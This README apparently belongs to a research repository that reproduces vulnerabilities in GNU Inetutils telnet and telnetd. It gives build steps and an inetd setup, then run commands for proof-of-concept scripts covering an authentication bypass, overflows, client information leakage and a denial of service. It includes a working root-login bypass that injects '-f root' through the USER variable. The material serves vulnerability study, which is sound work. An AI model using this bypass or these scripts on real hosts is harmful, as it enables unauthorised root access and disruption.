GNU Inetutils Telnet Vulnerability Analysis

This repository contains the documentation, configuration files, and Proof of Concept (PoC) scripts used to analyze and reproduce security vulnerabilities within the telnet and telnetd components of GNU Inetutils version 2.4 and 2.8.

Repository Structure

• config/: Contains network and wrapper configuration files for the openbsd-inetd super-server.
• exploits/: Contains all Python and bash PoC scripts used to trigger the vulnerabilities.
• sast-results/: Contains static analysis logs generated by CodeQL and cppcheck.

Prerequisites

Ensure your system has the necessary tools to compile C code, handle network sockets, and run the Python scripts. Run the following on a Debian/Ubuntu-based system:

sudo apt update
sudo apt install -y build-essential openbsd-inetd python3 git wget curl

Installation & Build Instructions

To ensure consistency in reproducing the vulnerabilities, we use the inetutils-2.4 source code.

1. Download and Extract:

   wget -q --show-progress https://ftp.gnu.org/gnu/inetutils/inetutils-2.4.tar.gz
   tar -xzf inetutils-2.4.tar.gz
   cd inetutils-2.4

2. Compile specific Telnet components: We disable other network utilities to save time and isolate our target environment.

   mkdir build
   cd build
   ../configure --disable-servers --disable-clients --enable-telnetd --enable-telnet
   make
   cd ..

Server Configuration

The telnetd program requires a super-server to handle network connections. We use openbsd-inetd.

1. Create the local configuration file (config/inetd.conf):

   echo "2323 stream tcp nowait root $PWD/build/telnetd/telnetd telnetd" > config/inetd.conf

2. Start the server:

   sudo inetd -d $PWD/config/inetd.conf

Usage: Running the Exploits

Below are the instructions to reproduce each specific vulnerability. Ensure the inetd server is running on port 2323 before executing server-targeted exploits.

1. CVE-2026-24061: Authentication Bypass

This vulnerability leverages unsanitized environment variables to log in as root without a password.

USER="-f root" ./build/telnet/telnet -a 127.0.0.1 2323

2. CVE-2026-32746: Buffer Overflow (Server-Side)

This vulnerability triggers an Out-of-Bounds Write leading to a BSS memory leak during LINEMODE SLC negotiation.

python3 exploits/exploit.py

3. CVE-2026-32772: Information Disclosure (Client-Side)

This exploit sets up a rogue server to extract sensitive environment variables from a vulnerable client.

1. Terminal 1 (Start the rogue server):

   python3 exploits/server.py

2. Terminal 2 (Setup secrets and connect):

   export SECRET_1="SuperSecretData"
   ./build/telnet/telnet 127.0.0.1 2323

4. New Finding: Out-of-Bounds Write (Client-Side)

Triggers a buffer overflow on the client's slc_reply array.

1. Terminal 1 (Start rogue server):

   python3 exploits/slc_overflow_server.py 127.0.0.1 2323 60

2. Terminal 2 (Connect client):

   ./build/telnet/telnet 127.0.0.1 2323

5. New Finding: Pre-Authentication Resource Exhaustion (DoS)

Stalls the server's pre-authentication phase by exploiting a missing timeout in the io_drain loop.

python3 exploits/tspeed_hang_many.py 127.0.0.1 2323 100 60.0

---

Disclaimer: All scripts and tools provided in this repository are strictly for educational and academic purposes, intended only for testing authorized local environments.